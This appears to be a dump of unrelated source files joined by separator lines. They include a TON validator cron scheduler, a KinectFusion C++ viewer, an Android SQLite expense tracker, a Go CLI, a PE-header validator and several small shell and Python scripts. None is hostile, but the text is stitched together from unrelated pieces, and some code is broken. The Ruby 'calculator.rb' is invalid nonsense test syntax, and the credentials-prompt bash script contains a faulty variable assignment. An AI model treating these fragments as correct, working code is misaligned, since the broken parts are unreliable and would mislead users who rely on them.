NEXT_BAL_TIME=$(($NEXT_ADNL_TIME + $TIME_SHIFT))
NEXT_CHG_TIME=$(($NEXT_BAL_TIME + $TIME_SHIFT))
NXT_ELECT_1=$(GET_M_H "$NEXT_ELECTION_TIME")
NXT_ELECT_2=$(GET_M_H "$NEXT_ELECTION_SECOND_TIME")
NXT_ELECT_3=$(GET_M_H "$NEXT_ADNL_TIME")
NXT_ELECT_4=$(GET_M_H "$NEXT_BAL_TIME")
NXT_ELECT_5=$(GET_M_H "$NEXT_CHG_TIME")
GET_PART_LIST_TIME=$((election_id - EEND_BEFORE))
GPL_TIME_MH=$(GET_M_H "$GET_PART_LIST_TIME")
#===================================================
CURRENT_CHG_TIME=`crontab -l |tail -n 1 | awk '{print $1 " " $2}'`
GET_F_T(){
OS_SYSTEM=`uname`
ival="${1}"
if [[ "$OS_SYSTEM" == "Linux" ]];then
echo "$(date +'%Y-%m-%d %H:%M:%S' -d @$ival)"
else
echo "$(date -r $ival +'%Y-%m-%d %H:%M:%S')"
fi
}
Curr_Elect_Time=$((CURR_VAL_UNTIL - STRT_BEFORE))
Next_Elect_Time=$((CURR_VAL_UNTIL + VAL_DUR - STRT_BEFORE))
echo
echo "Current elections time start: $Curr_Elect_Time / $(GET_F_T "$Curr_Elect_Time")"
echo "Next elections time start: $Next_Elect_Time / $(GET_F_T "$Next_Elect_Time")"
echo "-------------------------------------------------------------------"
# if [[ ! -z $NEXT_VAL__EXIST ]] && [[ "$election_id" == "0" ]];then
# NXT_ELECT_1=$PRV_ELECT_1
# NXT_ELECT_2=$PRV_ELECT_2
# NXT_ELECT_3=$PRV_ELECT_3
# NXT_ELECT_4=$PRV_ELECT_4
# fi
# sudo crontab -u $SCRPT_USER -r
OS_SYSTEM=`uname -s`
FB_CT_HEADER=""
if [[ "$OS_SYSTEM" == "FreeBSD" ]];then
CRONT_JOBS=$(cat <<-_ENDCRN_
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin:$NODE_BIN_DIR
HOME=$USER_HOME
$NXT_ELECT_1 * * * cd ${SCRIPT_DIR} && ./prepare_elections.sh &>> ${TON_LOG_DIR}/validator.log
$NXT_ELECT_2 * * * cd ${SCRIPT_DIR} && ./take_part_in_elections.sh &>> ${TON_LOG_DIR}/validator.log
$NXT_ELECT_3 * * * cd ${SCRIPT_DIR} && ./next_elect_set_time.sh &>> ${TON_LOG_DIR}/validator.log && ./part_check.sh &>> ${TON_LOG_DIR}/validator.log
# $GPL_TIME_MH * * * cd ${SCRIPT_DIR} && ./get_participant_list.sh > ${ELECTIONS_HISTORY_DIR}/${election_id}_parts.lst && chmod 444 ${ELECTIONS_HISTORY_DIR}/${election_id}_parts.lst
_ENDCRN_
)
else
CRONT_JOBS=$(cat <<-_ENDCRN_
SHELL=/bin/bash
PATH=$NODE_BIN_DIR:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
HOME=$USER_HOME
$NXT_ELECT_1 * * * cd ${SCRIPT_DIR} && ./prepare_elections.sh &>> ${TON_LOG_DIR}/validator.log
$NXT_ELECT_2 * * * cd ${SCRIPT_DIR} && ./take_part_in_elections.sh &>> ${TON_LOG_DIR}/validator.log
$NXT_ELECT_3 * * * cd ${SCRIPT_DIR} && ./next_elect_set_time.sh &>> ${TON_LOG_DIR}/validator.log && ./part_check.sh &>> ${TON_LOG_DIR}/validator.log
# $GPL_TIME_MH * * * script --return --quiet --append --command "cd ${SCRIPT_DIR} && ./get_participant_list.sh > ${ELECTIONS_HISTORY_DIR}/${election_id}_parts.lst && chmod 444 ${ELECTIONS_HISTORY_DIR}/${election_id}_parts.lst"
_ENDCRN_
)
fi
[[ "$1" == "show" ]] && echo "$CRONT_JOBS"&& exit 0
echo "$CRONT_JOBS" | sudo crontab -u $SCRPT_USER -
sudo crontab -l -u $SCRPT_USER | tail -n 8
#=================================================
# for icinga
echo "# prepare , participation , next elections ( minute hour ) - for crontab" > "${nextElections}"
echo "INFO ELECTIONS
$NXT_ELECT_1
$NXT_ELECT_2
$NXT_ELECT_3
" >> "${nextElections}"
echo "-------------------------------------------------------------------"
echo "+++INFO: $(basename "$0") FINISHED $(date +%s) / $(date)"
echo "================================================================================================"
exit 0
|
#!/usr/bin/env bash
version=$(curl -sX GET "https://data.services.jetbrains.com/products?code=DG&release.type=release" | jq -r '.[0].releases[0].version')
version="${version#*v}"
version="${version#*release-}"
printf "%s" "${version}"
|
<reponame>seichter/kfusion
/*
Copyright (c) 2011-2013 <NAME>, <NAME>
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
#include "kfusion.h"
#include "helpers.h"
#include "interface.h"
#include "perfstats.h"
#include <cstring>
#include <iostream>
#include <sstream>
#include <iomanip>
#include <cstdlib>
#include <cstring>
#ifdef __APPLE__
#include <GLUT/glut.h>
#elif defined(WIN32)
#define GLUT_NO_LIB_PRAGMA
#include <GL/glut.h>
#else
#include <GL/glut.h>
#endif
using namespace TooN;
KFusion kfusion;
Image<uchar4, HostDevice> lightScene, trackModel, lightModel, texModel;
Image<uint16_t, HostDevice> depthImage[2];
Image<uchar3, HostDevice> rgbImage;
const float3 light = make_float3(1, 1, -1.0);
const float3 ambient = make_float3(0.1, 0.1, 0.1);
SE3<float> initPose;
int counter = 0;
int integration_rate = 2;
bool reset = true;
bool should_integrate = true;
bool render_texture = false;
Image<float3, Device> pos, normals;
Image<float, Device> dep;
SE3<float> preTrans, trans, rot(makeVector(0.0, 0, 0, 0, 0, 0));
bool redraw_big_view = false;
std::unique_ptr<RGBD> rgbdDevice;
void display(void){
const uint2 imageSize = kfusion.configuration.inputSize;
static bool integrate = true;
glClear( GL_COLOR_BUFFER_BIT );
const double startFrame = Stats.start();
const double startProcessing = Stats.sample("kinect");
// kfusion.setKinectDeviceDepth(depthImage[GetKinectFrame()].getDeviceImage());
kfusion.setKinectDeviceDepth(depthImage[rgbdDevice->currentDepthBufferIndex()].getDeviceImage());
Stats.sample("raw to cooked");
integrate = kfusion.Track();
Stats.sample("track");
if((should_integrate && integrate && ((counter % integration_rate) == 0)) || reset){
kfusion.Integrate();
kfusion.Raycast();
Stats.sample("integrate");
if(counter > 2) // use the first two frames to initialize
reset = false;
}
renderLight( lightScene.getDeviceImage(), kfusion.inputVertex[0], kfusion.inputNormal[0], light, ambient );
renderLight( lightModel.getDeviceImage(), kfusion.vertex, kfusion.normal, light, ambient);
renderTrackResult(trackModel.getDeviceImage(), kfusion.reduction);
static int count = 4;
if(count > 3 || redraw_big_view){
renderInput( pos, normals, dep, kfusion.integration, toMatrix4( trans * rot * preTrans ) * getInverseCameraMatrix(kfusion.configuration.camera * 2), kfusion.configuration.nearPlane, kfusion.configuration.farPlane, kfusion.configuration.stepSize(), 0.75 * kfusion.configuration.mu);
count = 0;
redraw_big_view = false;
} else
count++;
if(render_texture)
renderTexture( texModel.getDeviceImage(), pos, normals, rgbImage.getDeviceImage(), getCameraMatrix(2*kfusion.configuration.camera) * inverse(kfusion.pose), light);
else
renderLight( texModel.getDeviceImage(), pos, normals, light, ambient);
cudaDeviceSynchronize();
Stats.sample("render");
glClear(GL_COLOR_BUFFER_BIT);
glRasterPos2i(0, 0);
glDrawPixels(lightScene); // left top
glRasterPos2i(0, 240);
glPixelZoom(0.5, -0.5);
glDrawPixels(rgbImage); // left bottom
glPixelZoom(1,-1);
glRasterPos2i(320,0);
glDrawPixels(lightModel); // middle top
glRasterPos2i(320,240);
glDrawPixels(trackModel); // middle bottom
glRasterPos2i(640, 0);
glDrawPixels(texModel); // right
const double endProcessing = Stats.sample("draw");
Stats.sample("total", endProcessing - startFrame, PerfStats::TIME);
Stats.sample("total_proc", endProcessing - startProcessing, PerfStats::TIME);
if(printCUDAError())
exit(1);
++counter;
if(counter % 50 == 0){
Stats.print();
Stats.reset();
std::cout << std::endl;
}
glutSwapBuffers();
}
void idle(void){
if (rgbdDevice->available())
glutPostRedisplay();
}
void keys(unsigned char key, int x, int y){
switch(key){
case 'c':
kfusion.Reset();
kfusion.setPose(toMatrix4(initPose));
reset = true;
break;
case 'q':
exit(0);
break;
case 'i':
should_integrate = !should_integrate;
break;
case 't':
render_texture = !render_texture;
break;
}
}
void specials(int key, int x, int y){
switch(key){
case GLUT_KEY_LEFT:
rot = SE3<float>(makeVector(0.0, 0, 0, 0, 0.1, 0)) * rot;
break;
case GLUT_KEY_RIGHT:
rot = SE3<float>(makeVector(0.0, 0, 0, 0, -0.1, 0)) * rot;
break;
case GLUT_KEY_UP:
rot *= SE3<float>(makeVector(0.0, 0, 0, -0.1, 0, 0));
break;
case GLUT_KEY_DOWN:
rot *= SE3<float>(makeVector(0.0, 0, 0, 0.1, 0, 0));
break;
}
redraw_big_view = true;
}
void reshape(int width, int height){
glMatrixMode(GL_MODELVIEW);
glLoadIdentity();
glViewport(0, 0, width, height);
glMatrixMode(GL_PROJECTION);
glLoadIdentity();
glColor3f(1.0f,1.0f,1.0f);
glRasterPos2f(-1, 1);
glOrtho(-0.375, width-0.375, height-0.375, -0.375, -1 , 1); //offsets to make (0,0) the top left pixel (rather than off the display)
glPixelZoom(1,-1);
}
void exitFunc(void)
{
rgbdDevice->close();
kfusion.Clear();
cudaDeviceReset();
}
int main(int argc, char ** argv) {
const float default_size = 2.f;
KFusionConfig config;
// Search for --help argument
for (int i = 0; i < argc; ++i) {
if (std::string(argv[i]) == "--help") {
std::cout << "Usage: " << argv[0] << " [size] [dist_threshold] [normal_threshold]" << std::endl;
std::cout << std::endl;
std::cout << "Defaults:" << std::endl;
std::cout << " size: " << default_size << std::endl;
std::cout << " dist_threshold: " << config.dist_threshold << std::endl;
std::cout << " normal_threshold: " << config.normal_threshold << std::endl;
return 0;
}
}
const float size = (argc > 1) ? atof(argv[1]) : default_size;
// it is enough now to set the volume resolution once.
// everything else is derived from that.
// config.volumeSize = make_uint3(64);
// config.volumeSize = make_uint3(128);
// config.volumeSize = make_uint3(256);
config.volumeSize = make_uint3(512);
// these are physical dimensions in meters
config.volumeDimensions = make_float3(size);
config.nearPlane = 0.4f;
config.farPlane = 5.0f;
config.mu = 0.1;
config.combinedTrackAndReduce = false;
// change the following parameters for using 640 x 480 input images
config.inputSize = make_uint2(320,240);
// config.inputSize = make_uint2(640,480);
config.camera = make_float4(531.15/2, 531.15/2, 640/4, 480/4);
// config.camera = make_float4(614.221/2, 614.221/2, 640/4, 480/4);
// config.iterations is a vector<int>, the length determines
// the number of levels to be used in tracking
// push back more then 3 iteraton numbers to get more levels.
config.iterations[0] = 10;
config.iterations[1] = 5;
config.iterations[2] = 4;
config.dist_threshold = (argc > 2 ) ? atof(argv[2]) : config.dist_threshold;
config.normal_threshold = (argc > 3 ) ? atof(argv[3]) : config.normal_threshold;
initPose = SE3<float>(makeVector(size/2, size/2, 0, 0, 0, 0));
// rgbdDevice = RGBD::create(RGBD::kRGBDDeviceKinect);
// rgbdDevice = RGBD::create(RGBD::kRGBDRealSense);
rgbdDevice.reset(RGBD::create(RGBD::kRGBDDeviceOpenNI2));
if (rgbdDevice == 0L) {
std::cerr << "no capture device" << std::endl;
return -1;
}
glutInit(&argc, argv);
glutInitDisplayMode(GLUT_RGBA | GLUT_DOUBLE );
glutInitWindowSize(config.inputSize.x * 2 + 640, max(config.inputSize.y * 2, 480));
glutCreateWindow("kfusion");
kfusion.Init(config);
// input buffers
depthImage[0].alloc(make_uint2(640, 480));
depthImage[1].alloc(make_uint2(640, 480));
rgbImage.alloc(make_uint2(640, 480));
// render buffers
lightScene.alloc(config.inputSize), trackModel.alloc(config.inputSize), lightModel.alloc(config.inputSize);
pos.alloc(make_uint2(640, 480)), normals.alloc(make_uint2(640, 480)), dep.alloc(make_uint2(640, 480)), texModel.alloc(make_uint2(640, 480));
if(printCUDAError()) {
cudaDeviceReset();
return 1;
}
std::cout << "Using depthImage size: " << depthImage[0].size.x*depthImage[0].size.y * sizeof(uint16_t) << " bytes " << std::endl;
std::cout << "Using rgbImage size: " << rgbImage.size.x*rgbImage.size.y * sizeof(uchar3) << " bytes " << std::endl;
memset(depthImage[0].data(), 0, depthImage[0].size.x*depthImage[0].size.y * sizeof(uint16_t));
memset(depthImage[1].data(), 0, depthImage[1].size.x*depthImage[1].size.y * sizeof(uint16_t));
memset(rgbImage.data(), 0, rgbImage.size.x*rgbImage.size.y * sizeof(uchar3));
uint16_t * buffers[2] = {depthImage[0].data(), depthImage[1].data()};
rgbdDevice->setBuffers(buffers, (unsigned char *)rgbImage.data());
if (rgbdDevice->open()){
cudaDeviceReset();
return 1;
}
kfusion.setPose(toMatrix4(initPose));
// model rendering parameters
preTrans = SE3<float>::exp(makeVector(0.0, 0, -size, 0, 0, 0));
trans = SE3<float>::exp(makeVector(0.5, 0.5, 0.5, 0, 0, 0) * size);
atexit(exitFunc);
glutDisplayFunc(display);
glutKeyboardFunc(keys);
glutSpecialFunc(specials);
glutReshapeFunc(reshape);
glutIdleFunc(idle);
glutMainLoop();
return 0;
}
|
<gh_stars>10-100
Template.force_end_modal.helpers({
})
Template.force_end_modal.events({
'click #force_end_modal_ok': function (event, template) {
var reason = $("#force_end_modal_text").val();
if (!reason) {
toastr.error(TAPi18n.__("instance_cancel_error_reason_required"));
return;
}
InstanceManager.terminateIns(reason);
},
}) |
def simplify_path(path: str) -> str:
stack = []
components = path.split('/')
for component in components:
if component == '' or component == '.':
continue
elif component == '..':
if stack:
stack.pop()
else:
stack.append(component)
simplified_path = '/' + '/'.join(stack)
return simplified_path if simplified_path != '/' else simplified_path |
#!/bin/bash
# Create the config.js to provide client run-time config variables
C=dist/server/public/app/js/config.js
JS_APP_SERVER_URL=`[ -z "$JS_APP_SERVER_URL" ] && echo "http://localhost:3070/app" || echo "$JS_APP_SERVER_URL"`
JS_API_SERVER_URL=`[ -z "$JS_API_SERVER_URL" ] && echo "http://localhost:3060" || echo "$JS_API_SERVER_URL"`
JS_WIDGET_URL=`[ -z "$JS_WIDGET_URL" ] && echo "http://localhost:3061/widget" || echo "$JS_WIDGET_URL"`
JS_API_PATH=`[ -z "$JS_API_PATH" ] && echo "/api" || echo "$JS_API_PATH"`
echo -n "window.b2note = { appServerUrl: '"$JS_APP_SERVER_URL"', apiServerUrl: '"$JS_API_SERVER_URL"', widgetUrl: '"$JS_WIDGET_URL"', apiPath: '"$JS_API_PATH"' };" > $C
echo "$C created" |
class PEFileValidator:
def validate_data_directories(self, fileinfo):
if fileinfo['fileFormat'] != 'PE':
return False # File format is not PE
if 'dataDirectories' not in fileinfo or 'numberOfDataDirectories' not in fileinfo['dataDirectories']:
return False # Missing data directories information
if fileinfo['dataDirectories']['numberOfDataDirectories'] != 15:
return False # Number of data directories is not 15
data_directory_entries = fileinfo['dataDirectories'].get('dataDirectoryEntries', [])
if len(data_directory_entries) < 15:
return False # Insufficient data directory entries
data_directory_15 = data_directory_entries[14]
if data_directory_15.get('index') != 14:
return False # Incorrect index for the 15th data directory entry
if data_directory_15.get('address', 0) == 0 or data_directory_15.get('size', 0) == 0:
return False # Address or size of the 15th data directory entry is zero
return True # All validations passed
# Example usage:
fileinfo = {
'fileFormat': 'PE',
'dataDirectories': {
'numberOfDataDirectories': 15,
'dataDirectoryEntries': [
# ... 14 previous entries ...
{'index': 14, 'address': 12345, 'size': 67890}
]
}
}
validator = PEFileValidator()
result = validator.validate_data_directories(fileinfo)
print(result) # Output: True (if all validations pass) |
<filename>app/src/main/java/br/com/mbecker/jagastei/db/JaGasteiDbHelper.java
package br.com.mbecker.jagastei.db;
import android.content.ContentValues;
import android.content.Context;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteOpenHelper;
import android.util.Log;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashMap;
import java.util.HashSet;
import java.util.List;
import java.util.Map;
import java.util.Set;
import br.com.mbecker.jagastei.domain.ServiceDomain;
import br.com.mbecker.jagastei.util.TagUtil;
public class JaGasteiDbHelper extends SQLiteOpenHelper implements ServiceDomain {
private static final int DATABASE_VERSION = 2;
private static final String DATABASE_NAME = "JaGastei.db";
public JaGasteiDbHelper(Context context) {
super(context, DATABASE_NAME, null, DATABASE_VERSION);
}
public void onCreate(SQLiteDatabase db) {
db.execSQL(JaGasteiContract.SQL_CREATE_GASTO);
db.execSQL(JaGasteiContract.SQL_CREATE_TAG);
}
public void onUpgrade(SQLiteDatabase db, int oldVersion, int newVersion) {
switch (newVersion) {
case 2:
db.execSQL(JaGasteiContract.SQL_CREATE_TAG);
migrarVersao2(db);
break;
}
}
public void onDowngrade(SQLiteDatabase db, int oldVersion, int newVersion) {
switch (oldVersion) {
case 1:
db.execSQL(JaGasteiContract.SQL_DELETE_GASTO);
break;
case 2:
db.execSQL(JaGasteiContract.SQL_DELETE_TAG);
break;
}
}
private void migrarVersao2(SQLiteDatabase db) {
Cursor c = db.query(JaGasteiContract.GastoEntry.TABLE_NAME, new String[]{JaGasteiContract.GastoEntry._ID, JaGasteiContract.GastoEntry.COLUMN_NAME_OBS}, null, null, null, null, null);
if (c.moveToFirst()) {
Map<String, String> mapTags = new HashMap<>(20);
do {
long id = c.getLong(c.getColumnIndex(JaGasteiContract.GastoEntry._ID));
String obs = c.getString(c.getColumnIndex(JaGasteiContract.GastoEntry.COLUMN_NAME_OBS));
if (obs == null || obs.trim().isEmpty()) {
continue;
}
obs = obs.replaceAll(";", ",").replaceAll(" ", ";").toLowerCase();
ContentValues cv = new ContentValues();
cv.put(JaGasteiContract.GastoEntry.COLUMN_NAME_OBS, obs);
db.update(JaGasteiContract.GastoEntry.TABLE_NAME, cv, "_id = ?", new String[]{String.valueOf(id)});
String[] tags = obs.split(";");
for (String t : tags) {
String idTags = mapTags.get(t);
if (idTags != null) {
idTags += ";" + id;
} else {
idTags = String.valueOf(id);
}
mapTags.put(t, idTags);
}
} while (c.moveToNext());
c.close();
mapTags.forEach((k, v) -> {
ContentValues cv = new ContentValues();
cv.put(JaGasteiContract.TagEntry.COLUMN_NAME_TAG_NAME, k);
cv.put(JaGasteiContract.TagEntry.COLUMN_NAME_ID_GASTO, v);
db.insert(JaGasteiContract.TagEntry.TABLE_NAME, null, cv);
});
}
}
@Override
public long salvarGasto(GastoModel g) {
long id = 0;
try (SQLiteDatabase db = getWritableDatabase()) {
ContentValues values = new ContentValues();
values.put(JaGasteiContract.GastoEntry.COLUMN_NAME_VALOR, g.getValor());
values.put(JaGasteiContract.GastoEntry.COLUMN_NAME_QUANDO, g.getQuandoToTime());
values.put(JaGasteiContract.GastoEntry.COLUMN_NAME_MESANO, g.getMesAno());
values.put(JaGasteiContract.GastoEntry.COLUMN_NAME_LAT, g.getLat());
values.put(JaGasteiContract.GastoEntry.COLUMN_NAME_LNG, g.getLng());
values.put(JaGasteiContract.GastoEntry.COLUMN_NAME_OBS, g.getObs());
id = db.insert(JaGasteiContract.GastoEntry.TABLE_NAME, null, values);
} catch (Exception e) {
Log.d(getClass().getName(), "salvarGasto: " + e.getMessage());
}
return id;
}
@Override
public List<GastoModel> listarGastos(String mesAno) {
SQLiteDatabase db = getReadableDatabase();
Cursor c;
if (mesAno == null) {
c = db.query(JaGasteiContract.GastoEntry.TABLE_NAME, null, null, null, null, null, null);
} else {
c = db.query(JaGasteiContract.GastoEntry.TABLE_NAME, null, JaGasteiContract.GastoEntry.COLUMN_NAME_MESANO + "=?", new String[]{mesAno}, null, null, null, null);
}
return ModelBuilder.buildGastoLista(c);
}
@Override
public List<GastoModel> listarGastosPorTag(long tagId) {
List<GastoModel> result = new ArrayList<>(30);
SQLiteDatabase db = getReadableDatabase();
Cursor tagCursor = db.query(JaGasteiContract.TagEntry.TABLE_NAME, new String[]{JaGasteiContract.TagEntry.COLUMN_NAME_ID_GASTO}, JaGasteiContract.TagEntry._ID + "=?", new String[]{String.valueOf(tagId)}, null, null, null, "1");
if (tagCursor.moveToFirst()) {
String gastos = tagCursor.getString(tagCursor.getColumnIndex(JaGasteiContract.TagEntry.COLUMN_NAME_ID_GASTO));
Long[] ids = TagUtil.splitGastos(gastos);
for (Long id : ids) {
Cursor gastoCursor = db.query(JaGasteiContract.GastoEntry.TABLE_NAME, null, JaGasteiContract.GastoEntry._ID + "=?", new String[]{String.valueOf(id)}, null, null, null, "1");
if (gastoCursor.moveToFirst()) {
GastoModel g = ModelBuilder.buildGasto(gastoCursor);
result.add(g);
}
gastoCursor.close();
}
}
tagCursor.close();
return result;
}
@Override
public List<TagModel> listarTags() {
SQLiteDatabase db = getReadableDatabase();
Cursor c = db.query(JaGasteiContract.TagEntry.TABLE_NAME, null, null, null, null, null, null);
return ModelBuilder.buildTagLista(c);
}
@Override
public void atualizaTags(long id, List<String> tags) {
Cursor c;
SQLiteDatabase db = getWritableDatabase();
for (String t : tags) {
c = db.query(JaGasteiContract.TagEntry.TABLE_NAME, null, JaGasteiContract.TagEntry.COLUMN_NAME_TAG_NAME + "=?", new String[]{t}, null, null, null, "1");
if (c.moveToFirst()) {
TagModel tagModel = ModelBuilder.buildTag(c);
Set<Long> newTags = new HashSet<>(Arrays.asList(tagModel.getGastos()));
newTags.add(id);
if (newTags.size() > tagModel.getGastos().length) {
ContentValues cv = new ContentValues();
cv.put(JaGasteiContract.TagEntry.COLUMN_NAME_TAG_NAME, t);
cv.put(JaGasteiContract.TagEntry.COLUMN_NAME_ID_GASTO, TagUtil.tagsGastosToString(newTags));
db.update(JaGasteiContract.TagEntry.TABLE_NAME, cv, JaGasteiContract.TagEntry._ID + "=?", new String[]{String.valueOf(tagModel.getId())});
}
c.close();
} else {
ContentValues cv = new ContentValues();
cv.put(JaGasteiContract.TagEntry.COLUMN_NAME_TAG_NAME, t);
cv.put(JaGasteiContract.TagEntry.COLUMN_NAME_ID_GASTO, String.valueOf(id));
db.insert(JaGasteiContract.TagEntry.TABLE_NAME, null, cv);
}
}
}
/*
public String totalMes(String mesAno) {
double res = 0;
SQLiteDatabase db = getReadableDatabase();
Cursor c = db.rawQuery(JaGasteiContract.SQL_TOTAL_MES, new String[]{mesAno});
if (c.moveToFirst()) {
res = c.getDouble(0);
}
c.close();
return Util.frmValor(res);
}
*/
}
|
package main
import (
"fmt"
"os"
"github.com/simone-trubian/blockchain-tutorial/fs"
"github.com/spf13/cobra"
)
const flagDataDir = "datadir"
const flagPort = "port"
const flagIP = "ip"
const flagMiner = "miner"
const flagBootstrapAcc = "bootstrap-account"
const flagBootstrapIp = "bootstrap-ip"
const flagBootstrapPort = "bootstrap-port"
func main() {
var sbCmd = &cobra.Command{
Use: "sb",
Short: "Simone's blockchain command line interface",
Run: func(cmd *cobra.Command, args []string) {},
}
sbCmd.AddCommand(versionCmd)
sbCmd.AddCommand(runCmd())
sbCmd.AddCommand(balancesCmd())
sbCmd.AddCommand(walletCmd())
err := sbCmd.Execute()
if err != nil {
fmt.Fprintln(os.Stderr, err)
os.Exit(1)
}
}
func addDefaultRequiredFlags(cmd *cobra.Command) {
cmd.Flags().String(
flagDataDir,
"",
"Absolute path to the node data dir where the DB will/is stored")
cmd.MarkFlagRequired(flagDataDir)
}
func getDataDirFromCmd(cmd *cobra.Command) string {
dataDir, _ := cmd.Flags().GetString(flagDataDir)
return fs.ExpandPath(dataDir)
}
func incorrectUsageErr() error {
return fmt.Errorf("incorrect usage")
}
|
const cron = require('node-cron');
const APICatalogService = require('../app/services/api-catalog.service');
/**
# ┌────────────── second
# │ ┌──────────── minute
# │ │ ┌────────── hour
# │ │ │ ┌──────── day of month
# │ │ │ │ ┌────── month
# │ │ │ │ │ ┌──── day of week
# │ │ │ │ │ │
# │ │ │ │ │ │
# * * * * * *
*/
const HOURLY_CRON_TAB = '0 * * * *';
module.exports = () => {
cron.schedule(HOURLY_CRON_TAB, () => {
console.log('Hourly Cron Started');
console.log('API Catalog Cron Job triggered!');
APICatalogService.writeApiEntries()
.then(() => console.log('API Catalog Cron Job successfully finished.'))
.catch(() => console.log('An error occurred during the API Catalog Cron Job.'));
});
};
|
#! /bin/bash
echo "Enter your ProductID:"
read productid
echo ProductID = \"$productid\" >> creds.py
echo "Enter your Security Profile Description:"
read spd
echo Security_Profile_Description = \"$spd\" >> creds.py
echo "Enter your Security Profile ID:"
read spid
echo Security_Profile_ID = \"$spid\" >> creds.py
echo "Enter your Security Client ID:"
read cid
echo Client_ID = \"$cid\" >> creds.py
echo "Enter your Security Client Secret:"
read secret
echo Client_Secret = \"$secret\" >> creds.py
ip = `ifconfig eth0 | grep "inet addr" | cut -d ':' -f 2 | cut -d ' ' -f 1`
python ./auth_web.py
echo "Open http://$ip:5000"
|
package com.sopra.bbl.msa.event.dto;
import com.sopra.bbl.msa.event.domain.Event;
import com.sopra.bbl.msa.event.domain.EventType;
import org.apache.commons.lang3.builder.ToStringBuilder;
import java.time.LocalDate;
import java.time.temporal.ChronoUnit;
/**
* DTO représentant l'enregistrement à un événement
*
* @author jntakpe
*/
public class EventRegistrationDTO {
private String to;
private String name;
private EventType type;
private LocalDate start;
private Integer duration;
private ChronoUnit durationUnit;
public EventRegistrationDTO() {
}
public EventRegistrationDTO(Event event, String to) {
setName(event.getName());
setType(event.getType());
setStart(event.getStart());
setDuration(event.getDuration());
setDurationUnit(event.getDurationUnit());
setTo(to);
}
public String getTo() {
return to;
}
public void setTo(String to) {
this.to = to;
}
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public EventType getType() {
return type;
}
public void setType(EventType type) {
this.type = type;
}
public LocalDate getStart() {
return start;
}
public void setStart(LocalDate strart) {
this.start = strart;
}
public Integer getDuration() {
return duration;
}
public void setDuration(Integer duration) {
this.duration = duration;
}
public ChronoUnit getDurationUnit() {
return durationUnit;
}
public void setDurationUnit(ChronoUnit durationUnit) {
this.durationUnit = durationUnit;
}
@Override
public String toString() {
return new ToStringBuilder(this)
.append("to", to)
.append("name", name)
.append("type", type)
.append("strart", start)
.append("duration", duration)
.append("durationUnit", durationUnit)
.toString();
}
}
|
<filename>calculator.rb<gh_stars>0
def ./calculator.rb
it"contains a local variable called first_number that is assigned to a number"
do
expect(first_number).equal_to(x)
x=2
expect(second_number).not_to equal(y)
y=3
expect(sum).x+y(5)
expect(sum).5-y(x)
expect(sum).x*1(x)
expect(sum).6/x(y)
# code for test is an integer
end
|
#!/usr/bin/env bash
# For all ".in" files, use `sed` to find and replace (with backup)
# all instances of "{comp_status}" with "Enabled".
all=`find ~/projects/mdpiper/component_metadata -iname "*.in"`
for file in $all; do
sed -i.foo 's@{comp_status}@Enabled @' $file
done
exit 0
|
package com.example.administrator.mobilesafe;
import android.content.Intent;
import android.database.DataSetObserver;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.view.View;
import android.view.ViewGroup;
import android.widget.AdapterView;
import android.widget.BaseAdapter;
import android.widget.GridView;
import android.widget.ImageView;
import android.widget.ListAdapter;
import android.widget.TextView;
public class HomeActivity extends AppCompatActivity {
private GridView gv_home_items;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_home);
//
gv_home_items = (GridView) findViewById(R.id.gv_home_items);
gv_home_items.setAdapter(new HomeItemsAdapter());
gv_home_items.setOnItemClickListener(new AdapterView.OnItemClickListener() {
@Override
public void onItemClick(AdapterView<?> parent, View view, int position, long id) {
if (position == 8) {
Intent intent = new Intent();
intent.setClass(getApplicationContext(),SettingsActivity.class);
startActivity(intent);
}
}
});
}
String[] itemNames = new String[]{"手机防盗","通讯卫士","软件管理","进程管理","流量统计","手机杀毒","缓存清理",
"高级工具","设置中心"};
int[] imageNames = new int[]{R.drawable.safe,R.drawable.callmsgsafe,R.drawable.app,R.drawable.taskmanager,
R.drawable.netmanager,R.drawable.trojan,R.drawable.sysoptimize,R.drawable.atools,R.drawable.settings};
private class HomeItemsAdapter extends BaseAdapter {
@Override
public int getCount() {
return 9;
}
@Override
public Object getItem(int position) {
return null;
}
@Override
public long getItemId(int position) {
return 0;
}
@Override
public View getView(int position, View convertView, ViewGroup parent) {
View view = View.inflate(getApplicationContext(),R.layout.item_home,null);
ImageView imageView =(ImageView) view.findViewById(R.id.iv_home_item);
imageView.setImageResource(imageNames[position]);
TextView textView = (TextView) view.findViewById(R.id.tv_home_item);
textView.setText(itemNames[position]);
return view;
}
@Override
public int getItemViewType(int position) {
return 0;
}
}
}
|
<reponame>get-bundled/axyz-sdk<filename>packages/axyz-react/src/components/ModalConnect/index.ts
export { default } from './ModalConnect';
|
# Copyright 2011 The Apache Software Foundation
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
